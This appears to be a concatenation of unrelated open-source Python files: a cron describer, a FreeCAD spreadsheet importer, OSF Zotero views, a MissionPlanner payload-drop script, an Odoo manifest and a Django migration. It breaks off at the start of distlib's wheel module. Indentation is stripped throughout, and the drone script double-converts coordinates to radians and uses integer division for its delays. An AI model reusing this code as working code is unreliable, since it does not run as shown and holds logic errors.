for i, segment in enumerate(segments):
if i > 0 and len(segments) > 2:
description_content += ","
if i < len(segments) - 1:
description_content += " "
if i > 0 and len(segments) > 1 and (i == len(segments) - 1 or len(segments) == 2):
description_content += _(" and ")
if "-" in segment:
between_description = self.generate_between_segment_description(
segment,
lambda s: _(", {0} through {1}"),
get_single_item_description
)
between_description = between_description.replace(", ", "")
description_content += between_description
else:
description_content += get_single_item_description(segment)
description = get_description_format(
expression).format(
description_content)
elif "-" in expression:
description = self.generate_between_segment_description(
expression, get_between_description_format, get_single_item_description)
return description
def generate_between_segment_description(
self,
between_expression,
get_between_description_format,
get_single_item_description
):
"""
Generates the between segment description
:param between_expression:
:param get_between_description_format:
:param get_single_item_description:
:return: The between segment description
"""
description = ""
between_segments = between_expression.split('-')
between_segment_1_description = get_single_item_description(between_segments[0])
between_segment_2_description = get_single_item_description(between_segments[1])
between_segment_2_description = between_segment_2_description.replace(
":00", ":59")
between_description_format = get_between_description_format(between_expression)
description += between_description_format.format(between_segment_1_description, between_segment_2_description)
return description
def format_time(
self,
hour_expression,
minute_expression,
second_expression=''
):
"""Given time parts, will contruct a formatted time description
Args:
hour_expression: Hours part
minute_expression: Minutes part
second_expression: Seconds part
Returns:
Formatted time description
"""
hour = int(hour_expression)
period = ''
if self._options.use_24hour_time_format is False:
period = " PM" if (hour >= 12) else " AM"
if hour > 12:
hour -= 12
minute = str(int(minute_expression)) # !FIXME WUT ???
second = ''
if second_expression is not None and second_expression:
second = "{}{}".format(":", str(int(second_expression)).zfill(2))
return "{0}:{1}{2}{3}".format(str(hour).zfill(2), minute.zfill(2), second, period)
def transform_verbosity(self, description, use_verbose_format):
"""Transforms the verbosity of the expression description by stripping verbosity from original description
Args:
description: The description to transform
use_verbose_format: If True, will leave description as it, if False, will strip verbose parts
Returns:
The transformed description with proper verbosity
"""
if use_verbose_format is False:
description = description.replace(
_(", every minute"), '')
description = description.replace(_(", every hour"), '')
description = description.replace(_(", every day"), '')
return description
def transform_case(self, description, case_type):
"""Transforms the case of the expression description, based on options
Args:
description: The description to transform
case_type: The casing type that controls the output casing
Returns:
The transformed description with proper casing
"""
if case_type == CasingTypeEnum.Sentence:
description = "{}{}".format(
description[0].upper(),
description[1:])
elif case_type == CasingTypeEnum.Title:
description = description.title()
else:
description = description.lower()
return description
def number_to_day(self, day_number):
"""Returns localized day name by its CRON number
Args:
day_number: Number of a day
Returns:
Day corresponding to day_number
Raises:
IndexError: When day_number is not found
"""
return [
calendar.day_name[6],
calendar.day_name[0],
calendar.day_name[1],
calendar.day_name[2],
calendar.day_name[3],
calendar.day_name[4],
calendar.day_name[5]
][day_number]
def __str__(self):
return self.get_description()
def __repr__(self):
return self.get_description()
def get_description(expression, options=None):
"""Generates a human readable string for the Cron Expression
Args:
expression: The cron expression string
options: Options to control the output description
Returns:
The cron expression description
"""
descripter = ExpressionDescriptor(expression, options)
return descripter.get_description(DescriptionTypeEnum.FULL)
| mit |
usakhelo/FreeCAD | src/Mod/Spreadsheet/importXLSX.py | 2 | 14873 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# importXLSX.py
#
# This library imports an Excel-XLSX-file into FreeCAD.
#
# Copyright (C) 2016 Ulrich Brammer <ulrich1a@users.sourceforge.net>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA
from __future__ import print_function
__title__="FreeCAD Spreadsheet Workbench - XLSX importer"
__author__ = "Ulrich Brammer <ulrich1a@users.sourceforge.net>"
__url__ = ["http://www.freecadweb.org"]
'''
This library imports an Excel-XLSX-file into FreeCAD.
Version 1.1, Nov. 2016:
Changed parser, adds rad-unit to trigonometric functions in order
to give the same result in FreeCAD.
Added factor to arcus-function in order to give the same result in FreeCAD
Added support for celltype "inlineStr"
Version 1.0:
It uses a minimal parser, in order to translate the IF-function into
the different FreeCAD version.
The other function-names are translated by search and replace.
Features:
- Imports tables defined inside Excel-document
- Set alias definitions
- Translate formulas known by FreeCAD. (see tokenDic as by version 1.1)
- set cross table references
- strings are imported
- references to cells with strings are working
known issues:
- units are not imported
- string support is minimal, the same as in FreeCAD
'''
import zipfile
import xml.dom.minidom
import FreeCAD as App
try: import FreeCADGui
except ValueError: gui = False
else: gui = True
if open.__module__ == '__builtin__':
pythonopen = open
# The sepToken structure is used in the tokenizer functions isKey and
# getNextToken.
# sepToken defines a search tree for separator tokens with length of 1 to 3 characters
# it is also used as a list of separators between other tokens.
sepToken = {
'(':None,
'=':None,
'<':'branchLower',
'>':'branchHigher',
')':None,
# '"':None,
# ';':None,
' ':None,
',':None, # Separator on lists
'!':None, #Connector to cells on other Sheets
'+':None,
'-':None,
'*':None,
'/':None,
'^':None
}
branchLower ={
'>':None,
'=':None
}
branchHigher = {'=':None}
# Needed to get a reference from a string to a dict
treeDict = {
'branchLower':branchLower,
'branchHigher':branchHigher
}
# The tokenDic is used in parseExpr.
# The tokenDic contains the following information:
# levelchange: -1: tree down, 0, +1: tree up
# replacement token
# function-state: needed to do something special in the parser
# 0 = normal, 1 = the pi-case, 2 = angle-function,
# 3 = IF-function, 4 = IF-truecase, 5 IF-falsecase
tokenDic = {
'(' :( 1, '(', 0),
'=' :( 0 ,'==', 0),
'<>' :( 0 ,'!=', 0),
'>=' :( 0 ,'>=', 0),
'<=' :( 0 ,'<=', 0),
'<' :( 0 ,'<', 0),
'>' :( 0 ,'>', 0),
',' :( 0 ,',', 0),
')' :(-1 ,')', 0),
'!' :( 0 ,'.', 0), #Connector to cells on other Sheets
# '"' :( 2 ,'', 0),
'+' :( 0 ,'+', 0),
'-' :( 0 ,'-', 0),
'*' :( 0 ,'*', 0),
'/' :( 0 ,'/', 0),
'^' :( 0 ,'^', 0),
'IF' :( 0, '', 3),
'ABS' :( 0, 'abs', 0),
'ACOS' :( 0, 'pi/180deg*acos', 0),
'ASIN' :( 0, 'pi/180deg*asin', 0),
'ATAN' :( 0, 'pi/180deg*atan', 0),
'ATAN2':( 0, 'pi/180deg*atan2',0),
'COS' :( 0, 'cos', 2),
'COSH' :( 0, 'cosh', 2),
'EXP' :( 0, 'exp', 0),
'LOG' :( 0, 'log', 0),
'LOG10':( 0, 'log10',0),
'MOD' :( 0, 'mod', 0),
'POWER':( 0, 'pow', 0),
'SIN' :( 0, 'sin', 2),
'SINH' :( 0, 'sinh', 2),
'SQRT' :( 0, 'sqrt', 0),
'TAN' :( 0, 'tan', 2),
'TANH' :( 0, 'tanh', 2),
'AVERAGE':( 0, 'average', 0),
'COUNT':( 0, 'count',0),
'MAX' :( 0, 'max', 0),
'MIN' :( 0, 'min', 0),
'STDEVA':( 0, 'stddev',0),
'SUM' :( 0, 'sum', 0),
'PI' :( 0, 'pi', 1)
}
class exprNode(object):
''' This defines a tree class for expression parsing.
A tree is build, to step down into the levels of the expression.'''
def __init__(self, parent, state, actIndex):
self.state = state #see comment: State used for Angle-functions and IF-function
self.parent = parent # Parent tree node
self.lIndex = actIndex # Index to the list of tokens
self.result = ''
class FormulaTranslator(object):
''' This class tranlates a cell-formula from Excel to FreeCAD.'''
def __init__(self):
self.tokenList = ['=']
def translateForm(self, actExpr):
self.getNextToken(actExpr)
#print("tokenList: ", self.tokenList)
self.resultTree = exprNode(None, 0, 1)
self.resultTree.result = self.tokenList[0]
self.parseExpr(self.resultTree)
#print('parseResult: ', self.resultTree.result)
return self.resultTree.result
def getNextToken(self, theExpr):
''' This is the recursive tokenizer for an excel formula.
It appends all identified tokens to self.tokenList.'''
#print('next Token theExpr: ', theExpr)
#print('actTList: ', self.tokenList)
tokenComplete = False
keyToken = False
if len(theExpr)>0:
theTok = theExpr[0]
theExpr = theExpr[1:]
if theTok in sepToken:
keyToken = True
branch = sepToken[theTok]
while branch:
#print(branch, ' theExpr[0]: ',theExpr[0])
if theExpr[0] in treeDict[branch]:
branch = treeDict[branch][theExpr[0]]
theTok = theTok + theExpr[0]
theExpr = theExpr[1:]
else:
branch= None
tokenComplete = True
self.tokenList.append(theTok)
self.getNextToken(theExpr)
else:
if len(theExpr)>0:
while (not tokenComplete):
if not self.isKey(theExpr):
theTok = theTok + theExpr[0]
theExpr = theExpr[1:]
if len(theExpr) == 0:
tokenComplete = True
else:
tokenComplete = True
self.tokenList.append(theTok)
self.getNextToken(theExpr)
def isKey(self, theExpr):
#print('look up: ', theExpr)
keyToken = False
lenExpr = len(theExpr)
if theExpr[0] in sepToken:
branch = sepToken[theExpr[0]]
if branch == None:
keyToken = True
else:
#print('There is a branch. look up: ', theExpr[1])
if (lenExpr > 1) and (theExpr[1] in treeDict[branch]):
branch = treeDict[branch][theExpr[0]]
if branch == None:
keyToken = True
else:
if (lenExpr > 2) and (theExpr[2] in treeDict[branch]):
keyToken = True
else:
keyToken = True
return keyToken
def parseExpr(self, treeNode):
token = self.tokenList[treeNode.lIndex]
treeNode.lIndex += 1
if token in tokenDic:
lChange, newToken, funcState = tokenDic[token]
else:
lChange = 0
newToken = token
funcState = 0
#print('treeNode.state: ', treeNode.state, ' my.index: ', treeNode.lIndex-1, ' ', token, ' fState: ', funcState)
if token == ',':
if (treeNode.state == 4):
newToken = ':'
treeNode.state = 6
if (treeNode.state == 3):
newToken = '?'
treeNode.state = 4
if funcState == 3:
funcState = 0
newNode = exprNode(treeNode, 3, treeNode.lIndex)
self.parseIF(newNode)
else:
treeNode.result = treeNode.result + newToken
if funcState == 2:
funcState = 0
newNode = exprNode(treeNode, 2, treeNode.lIndex)
self.parseAngle(newNode)
treeNode.result = treeNode.result + ')'
elif funcState == 1:
treeNode.lIndex += 2 # do skip the 2 parentheses of the PI()
if lChange == -1:
#print 'state: ', treeNode.state, 'parent.result: ', treeNode.parent.result, ' mine: ', treeNode.result
treeNode.parent.result = treeNode.parent.result + treeNode.result
treeNode.parent.lIndex = treeNode.lIndex
#print('Go one level up, state: ', treeNode.state)
if (treeNode.state < 2):
#print(' Look up more token above')
if treeNode.lIndex < len(self.tokenList):
self.parseExpr(treeNode.parent)
elif lChange == 1:
#print('Go one level down')
newNode = exprNode(treeNode, 1, treeNode.lIndex)
self.parseExpr(newNode)
treeNode.lIndex = newNode.lIndex
else:
if treeNode.lIndex < len(self.tokenList):
#print('parse to the end')
self.parseExpr(treeNode)
def parseIF(self, treeNode):
#print('IF state: ', treeNode.state)
treeNode.result = treeNode.result + '('
treeNode.lIndex += 1
self.parseExpr(treeNode)
#print('IF result: ', treeNode.result)
return
def parseAngle(self, treeNode):
#print('Angle state: ', treeNode.state)
treeNode.result = treeNode.result + '(1rad*('
treeNode.lIndex += 1
self.parseExpr(treeNode)
#print('angle result: ', treeNode.result)
def getText(nodelist):
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc.append(node.data)
return ''.join(rc)
def handleWorkSheet(theDom, actSheet, strList):
rows = theDom.getElementsByTagName("row")
for row in rows:
handleCells(row.getElementsByTagName("c"), actSheet, strList)
def handleCells(cellList, actCellSheet, sList):
for cell in cellList:
cellAtts = cell.attributes
refRef = cellAtts.getNamedItem("r")
ref = getText(refRef.childNodes)
refType = cellAtts.getNamedItem("t")
if refType:
cellType = getText(refType.childNodes)
else:
cellType = 'n' # FIXME: some cells don't have t and s attributes
#print("reference: ", ref, ' Cell type: ', cellType)
if cellType == 'inlineStr':
iStringList = cell.getElementsByTagName("is")
#print('iString: ', iStringList)
for stringEle in iStringList:
tElement = stringEle.getElementsByTagName('t')[0]
theString = getText(tElement.childNodes)
#print('theString: ', theString)
actCellSheet.set(ref, theString.encode('utf8'))
formulaRef = cell.getElementsByTagName("f")
if len(formulaRef)==1:
theFormula = getText(formulaRef[0].childNodes)
#print("theFormula: ", theFormula)
fTrans = FormulaTranslator()
actCellSheet.set(ref, fTrans.translateForm(theFormula))
else:
valueRef = cell.getElementsByTagName("v")
#print('valueRef: ', valueRef)
if len(valueRef)==1:
valueRef = cell.getElementsByTagName("v")[0]
if valueRef:
theValue = getText(valueRef.childNodes)
#print("theValue: ", theValue)
if cellType == 'n':
actCellSheet.set(ref, theValue)
if cellType == 's':
actCellSheet.set(ref, (sList[int(theValue)]).encode('utf8'))
def handleWorkBook(theBook, sheetDict, Doc):
theSheets = theBook.getElementsByTagName("sheet")
#print("theSheets: ", theSheets)
for sheet in theSheets:
sheetAtts = sheet.attributes
nameRef = sheetAtts.getNamedItem("name")
sheetName = getText(nameRef.childNodes)
#print("table name: ", sheetName)
idRef = sheetAtts.getNamedItem("sheetId")
sheetFile = "sheet" + getText(idRef.childNodes) + '.xml'
#print("sheetFile: ", sheetFile)
# add FreeCAD-spreadsheet
sheetDict[sheetName] = (Doc.addObject('Spreadsheet::Sheet', sheetName), sheetFile)
theAliases = theBook.getElementsByTagName("definedName")
for theAlias in theAliases:
aliAtts = theAlias.attributes
nameRef = aliAtts.getNamedItem("name")
aliasName = getText(nameRef.childNodes)
#print("aliasName: ", aliasName)
aliasRef = getText(theAlias.childNodes)
if '$' in aliasRef:
refList = aliasRef.split('!$')
adressList = refList[1].split('$')
#print("aliasRef: ", aliasRef)
#print('Sheet Name: ', refList[0])
#print('Adress: ', adressList[0] + adressList[1])
actSheet, sheetFile = sheetDict[refList[0]]
actSheet.setAlias(adressList[0]+adressList[1], aliasName.encode('utf8'))
def handleStrings(theStr, sList):
print('process Strings: ')
stringElements = theStr.getElementsByTagName('t')
for sElem in stringElements:
print('string: ', getText(sElem.childNodes))
sList.append(getText(sElem.childNodes))
def open(nameXLSX):
if len(nameXLSX) > 0:
z=zipfile.ZipFile(nameXLSX)
theDoc = App.newDocument()
sheetDict = dict()
stringList = []
theBookFile=z.open('xl/workbook.xml')
theBook = xml.dom.minidom.parse(theBookFile)
handleWorkBook(theBook, sheetDict, theDoc)
theBook.unlink()
if 'xl/sharedStrings.xml' in z.namelist():
theStringFile=z.open('xl/sharedStrings.xml')
theStrings = xml.dom.minidom.parse(theStringFile)
handleStrings(theStrings, stringList)
theStrings.unlink()
for sheetSpec in sheetDict:
#print("sheetSpec: ", sheetSpec)
theSheet, sheetFile = sheetDict[sheetSpec]
f=z.open('xl/worksheets/' + sheetFile)
myDom = xml.dom.minidom.parse(f)
handleWorkSheet(myDom, theSheet, stringList)
myDom.unlink()
z.close()
# This is needed more than once, otherwise some references are not calculated!
theDoc.recompute()
theDoc.recompute()
theDoc.recompute()
return theDoc
def insert(nameXLSX,docname):
try:
theDoc=App.getDocument(docname)
except NameError:
theDoc=App.newDocument(docname)
App.ActiveDocument = theDoc
sheetDict = dict()
stringList = []
z=zipfile.ZipFile(nameXLSX)
theBookFile=z.open('xl/workbook.xml')
theBook = xml.dom.minidom.parse(theBookFile)
handleWorkBook(theBook, sheetDict, theDoc)
theBook.unlink()
if 'xl/sharedStrings.xml' in z.namelist():
theStringFile=z.open('xl/sharedStrings.xml')
theStrings = xml.dom.minidom.parse(theStringFile)
handleStrings(theStrings, stringList)
theStrings.unlink()
for sheetSpec in sheetDict:
#print("sheetSpec: ", sheetSpec)
theSheet, sheetFile = sheetDict[sheetSpec]
f=z.open('xl/worksheets/' + sheetFile)
myDom = xml.dom.minidom.parse(f)
handleWorkSheet(myDom, theSheet, stringList)
myDom.unlink()
z.close()
# This is needed more than once, otherwise some references are not calculated!
theDoc.recompute()
theDoc.recompute()
theDoc.recompute()
| lgpl-2.1 |
brandonPurvis/osf.io | website/addons/zotero/views.py | 8 | 3269 | # -*- coding: utf-8 -*-
from flask import request
from framework.auth.decorators import must_be_logged_in
from website.project.decorators import (
must_be_contributor_or_public,
must_have_permission,
must_not_be_registration,
must_have_addon,
)
from .provider import ZoteroCitationsProvider
@must_be_logged_in
def zotero_list_accounts_user(auth):
"""Return the list of all of the current user's authorized Zotero accounts."""
provider = ZoteroCitationsProvider()
return provider.user_accounts(auth.user)
@must_have_permission('write')
@must_have_addon('zotero', 'node')
def zotero_get_config(auth, node_addon, **kwargs):
"""Serialize node addon settings and relevant urls
(see serialize_settings/serialize_urls)
"""
provider = ZoteroCitationsProvider()
result = provider.serializer(
node_settings=node_addon,
user_settings=auth.user.get_addon('zotero')
).serialized_node_settings
result['validCredentials'] = provider.check_credentials(node_addon)
return {'result': result}
@must_have_permission('write')
@must_have_addon('zotero', 'node')
@must_not_be_registration
def zotero_set_config(auth, node_addon, **kwargs):
"""Update ZoteroNodeSettings based on submitted account and folder information."""
provider = ZoteroCitationsProvider()
args = request.get_json()
external_list_id = args.get('external_list_id')
external_list_name = args.get('external_list_name')
provider.set_config(
node_addon,
auth.user,
external_list_id,
external_list_name,
auth,
)
return {
'result': provider.serializer(
node_settings=node_addon,
user_settings=auth.user.get_addon('zotero'),
).serialized_node_settings
}
@must_have_permission('write')
@must_have_addon('zotero', 'node')
@must_not_be_registration
def zotero_add_user_auth(auth, node_addon, **kwargs):
"""Allows for importing existing auth to ZoteroNodeSettings """
provider = ZoteroCitationsProvider()
external_account_id = request.get_json().get('external_account_id')
return provider.add_user_auth(node_addon, auth.user, external_account_id)
@must_have_permission('write')
@must_have_addon('zotero', 'node')
@must_not_be_registration
def zotero_remove_user_auth(auth, node_addon, **kwargs):
"""Removes auth from ZoteroNodeSettings """
provider = ZoteroCitationsProvider()
return provider.remove_user_auth(node_addon, auth.user)
@must_be_contributor_or_public
@must_have_addon('zotero', 'node')
def zotero_widget(node_addon, **kwargs):
"""Collects and serializes settting needed to build the widget."""
provider = ZoteroCitationsProvider()
return provider.widget(node_addon)
@must_be_contributor_or_public
@must_have_addon('zotero', 'node')
def zotero_citation_list(auth, node_addon, zotero_list_id=None, **kwargs):
"""Collects a listing of folders and citations based on the
passed zotero_list_id. If zotero_list_id is `None`, then all of the
authorizer's folders and citations are listed.
"""
provider = ZoteroCitationsProvider()
show = request.args.get('view', 'all')
return provider.citation_list(node_addon, auth.user, zotero_list_id, show)
| apache-2.0 |
Chatmetaleux/MissionPlanner | Scripts/example3.py | 72 | 2556 | import sys
import math
import clr
import time
clr.AddReference("MissionPlanner")
import MissionPlanner
clr.AddReference("MissionPlanner.Utilities") # includes the Utilities class
from MissionPlanner.Utilities import Locationwp
def gps_distance(lat1, lon1, lat2, lon2):
'''return distance between two points in meters,
coordinates are in degrees
thanks to http://www.movable-type.co.uk/scripts/latlong.html'''
radius_of_earth = 6378100.0
from math import radians, cos, sin, sqrt, atan2
lat1 = radians(lat1)
lat2 = radians(lat2)
lon1 = radians(lon1)
lon2 = radians(lon2)
dLat = lat2 - lat1
dLon = lon2 - lon1
a = sin(0.5*dLat)**2 + sin(0.5*dLon)**2 * cos(lat1) * cos(lat2)
c = 2.0 * atan2(sqrt(a), sqrt(1.0-a))
return radius_of_earth * c
print __name__
# main program
print "Start script"
######Mission variables######
dist_tolerance = 15 #(m)
ber_tolerance = 45 #heading tolerance
waypoint = 1 #desired Waypoint
######Time delays (ms)######
servo_delay = 50 #To be experimentally found
comm_delay = 50 #To be experimentally found
######Other constants######
payload_servo = 7 #5-8
gravity = 9.81
target = (-35, 117.98) # gps pos of target in degrees
time.sleep(5) # wait 10 seconds before starting
print 'Starting Mission'
Script.ChangeMode("Guided") # changes mode to "Guided"
item = MissionPlanner.Utilities.Locationwp() # creating waypoint
alt = 60.000000 # altitude value
Locationwp.lat.SetValue(item,target[0]) # sets latitude
Locationwp.lng.SetValue(item,target[1]) # sets longitude
Locationwp.alt.SetValue(item,alt) # sets altitude
print 'Drop zone set'
MAV.setGuidedModeWP(item) # tells UAV "go to" the set lat/long @ alt
print 'Going to DZ'
Good = True
while Good == True:
ground_speed = cs.groundspeed
alt = cs.alt
wp_dist = gps_distance(cs.lat ,cs.lng, math.radians(target[0]), math.radians(target[1]))
print wp_dist
ber_error = cs.ber_error
fall_time = ((2 * alt) / gravity) ** (0.5)
fall_dist = ground_speed * fall_time
release_time = fall_time + (servo_delay/1000) + (comm_delay/1000)
release_dist = release_time * ground_speed
if (math.fabs(release_dist - wp_dist) <= dist_tolerance):
if (math.fabs(ber_error) <= ber_tolerance):
######Payload Release######
Script.SendRC(payload_servo,1900,True)
print 'Bombs away!'
else:
print 'Heading outside of threshold, go around!'
Good = False
else:
print 'Outside of threshold!'
time.sleep (1.0) #sleep for a second
#Broken out of the loop as Bearing was not right
print 'Bearing was out of tolerance for the Drop - Start run again'
| gpl-3.0 |
Drooids/odoo | addons/analytic/__openerp__.py | 302 | 1891 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Analytic Accounting',
'version': '1.1',
'author' : 'OpenERP SA',
'website' : 'https://www.odoo.com/page/accounting',
'category': 'Hidden/Dependency',
'depends' : ['base', 'decimal_precision', 'mail'],
'description': """
Module for defining analytic accounting object.
===============================================
In OpenERP, analytic accounts are linked to general accounts but are treated
totally independently. So, you can enter various different analytic operations
that have no counterpart in the general financial accounts.
""",
'data': [
'security/analytic_security.xml',
'security/ir.model.access.csv',
'analytic_sequence.xml',
'analytic_view.xml',
'analytic_data.xml',
],
'demo': [],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mingot/datacademy_django | datacademy/accounts/migrations/0004_auto__add_teacher__del_field_datacademyprofile_favourite_snack.py | 1 | 8385 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Teacher'
db.create_table(u'accounts_teacher', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('profile', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['accounts.DatacademyProfile'], unique=True)),
('years_experience', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
))
db.send_create_signal(u'accounts', ['Teacher'])
# Deleting field 'DatacademyProfile.favourite_snack'
db.delete_column(u'accounts_datacademyprofile', 'favourite_snack')
def backwards(self, orm):
# Deleting model 'Teacher'
db.delete_table(u'accounts_teacher')
# Adding field 'DatacademyProfile.favourite_snack'
db.add_column(u'accounts_datacademyprofile', 'favourite_snack',
self.gf('django.db.models.fields.CharField')(default='TBD.', max_length=5),
keep_default=False)
models = {
u'accounts.datacademyprofile': {
'Meta': {'object_name': 'DatacademyProfile'},
'courses': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['courses.Course']", 'null': 'True', 'blank': 'True'}),
'exercises': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['courses.Exercise']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lectures': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['courses.Lecture']", 'null': 'True', 'blank': 'True'}),
'linkedin_profile': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'mugshot': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'privacy': ('django.db.models.fields.CharField', [], {'default': "'registered'", 'max_length': '15'}),
'short_bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'my_profile'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'accounts.teacher': {
'Meta': {'object_name': 'Teacher'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'profile': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['accounts.DatacademyProfile']", 'unique': 'True'}),
'years_experience': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'courses.course': {
'Meta': {'ordering': "['title']", 'object_name': 'Course'},
'date': ('django.db.models.fields.DateField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'short_description': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'courses.exercise': {
'Meta': {'ordering': "['number']", 'object_name': 'Exercise'},
'description': ('django.db.models.fields.TextField', [], {}),
'hint': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_code': ('django.db.models.fields.TextField', [], {}),
'lecture': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['courses.Lecture']"}),
'number': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'unit_test': ('django.db.models.fields.TextField', [], {})
},
u'courses.lecture': {
'Meta': {'ordering': "['number']", 'object_name': 'Lecture'},
'course': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['courses.Course']"}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'slides': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'video': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'video_duration': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['accounts'] | mit |
schinke/solid-fortnight-ba | flask/venv/lib/python2.7/site-packages/pip/_vendor/distlib/wheel.py | 412 | 39115 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2016 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
from __future__ import unicode_literals
import base64
import codecs
import datetime
import distutils.util
from email import message_from_file
import hashlib
import imp
import json
import logging
import os
import posixpath
import re
import shutil
import sys
import tempfile
import zipfile
from . import __version__, DistlibException
from .compat import sysconfig, ZipFile, fsdecode, text_type, filter
from .database import InstalledDistribution
from .metadata import Metadata, METADATA_FILENAME
from .util import (FileOperator, convert_path, CSVReader, CSVWriter, Cache,
cached_property, get_cache_base, read_exports, tempdir)
from .version import NormalizedVersion, UnsupportedVersionError
logger = logging.getLogger(__name__)
cache = None # created when needed
if hasattr(sys, 'pypy_version_info'):
IMP_PREFIX = 'pp'
elif sys.platform.startswith('java'):
IMP_PREFIX = 'jy'
elif sys.platform == 'cli':
IMP_PREFIX = 'ip'
else:
